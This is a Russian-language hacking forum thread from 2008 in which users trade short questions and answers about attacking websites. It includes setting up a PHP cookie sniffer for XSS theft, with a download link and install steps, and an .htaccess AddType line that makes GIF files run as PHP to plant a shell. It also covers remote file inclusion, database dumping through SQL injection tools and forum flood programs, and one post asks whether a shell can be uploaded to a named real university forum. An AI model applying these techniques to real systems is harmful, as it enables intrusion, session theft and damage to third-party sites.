Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    нужна помощь в xss, пытаюсь изучать, но много непонятных мелочей.
    предположим нужная мне xss
    насколько я смог понять куки записываются в картику hacknet.gif, т.е у меня должен быть свой сайт с картинкой, которую разрешено изменять на этом сайте без авторизации?или неправильно понял?
    Думаю идея вопроса более-менее понятна.
    Разъясните мне пожалуйста эти детали
     
  2. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    нет это просто ссылка на сниффер
     
  3. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    собственно сам вопрос
    ок, где взять этот снифер, как и где его разестить?
    ---------------------------------------------------------------------
    разьясните пожалуйста детали про получение куков
     
  4. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    _http://forum.antichat.ru/thread18555.html поиском пользоваться не барское дело?
    Вот собственно помощ по гринбировскому сниферу
    _http://forum.antichat.ru/thread36829.html
    все понятно написано
     
  5. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Ужс как всё сложно =\
    сливаешь http://old.antichat.ru/soft/s.zip, распаковываешь, заливаешь на сервер с поддержкой php, правишь конфиг (если таковой имеется) и всё. вставляешь в скрипт ссылку на сниффер
     
    _________________________
    3 people like this.
  6. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    сорри елли не туда
    возник вот такой вопрос есть ли вожможность обхода фильтрации ковычки через функцию quote() ? :)
     
  7. Rogun

    Rogun Elder - Старейшина

    Joined:
    12 Feb 2008
    Messages:
    76
    Likes Received:
    4
    Reputations:
    0
    Есть ли другие флуд-проги на форумах (IPB) помимо Antiturk(Denyo Lauch)?
    (при отсутствии ограничений содавать много тем либо сообщений)
     
  8. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Если создать файл .htaccess и вписать в него следующую строчку:
    AddTypeapplication/x-httpd-php gif - то все файлы с gif будут интрепетироваться как php файлы.
    Я так и сделал. Создать .htaccess. Вписал в него строку и решил проверить для начала на своем сайте. Закинул, полез, но система выдала предупреждение, что 500 ошибка. Вообщем, файл был недоступен.
    Почему? И как это можно исправить?
     
  9. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    каким образом можно сделать дамп всей базы данных
     
  10. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    у тя доступ к базе есть или через скуль ?
    если есть доступ к базе тогда почти через любой mysql клиент ежели через скуль Тогда попробуй через "SQL Injection Tool"

    2Ershik
    а в одном посте не судьба написать ?
    такую строчку к своему добавь removehandler.gif отменяет настройки по умолчанию для файлов.gif
     
    #1390 MaSter GeN, 26 Mar 2008
    Last edited: 26 Mar 2008
  11. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145

    addtype application/x-httpd-php gif
     
  12. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    Ershik проверь права на чтение если всё норм то смотри топик выше /\
    ||
     
  13. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    Доступ к базе есть. подскажи хоть 1 mysql клиент
     
  14. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    navicat, rst sql
     
  15. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    m0use
    http://forum.antichat.ru/showthread.php?t=51383
     
    3 people like this.
  16. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    у меня вопрос по php include,
    запрос вида .php?page=http://site.ru/xz.txt? выводит текст файла,почему не запускается shell?
     
  17. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    потому, что он не воспринимается, как php-файл
     
  18. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    1.
    Потому что это не инклуд а читалка файлов
    2.
    Мда. Ты админ хакерского форума?
    3.
    При инклуде любое расширение будет выполняться (пытаться выполниться) как php код.

    Это не инклуд
     
    2 people like this.
  19. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    спасибо за ответы))
     
  20. Buffalon

    Buffalon Elder - Старейшина

    Joined:
    22 Mar 2008
    Messages:
    241
    Likes Received:
    34
    Reputations:
    8
    Это серьёзно?Можн залить shell?
    http://studsovet.ulsu.ru/forum/
    Cори если не по теме
     
Thread Status:
Not open for further replies.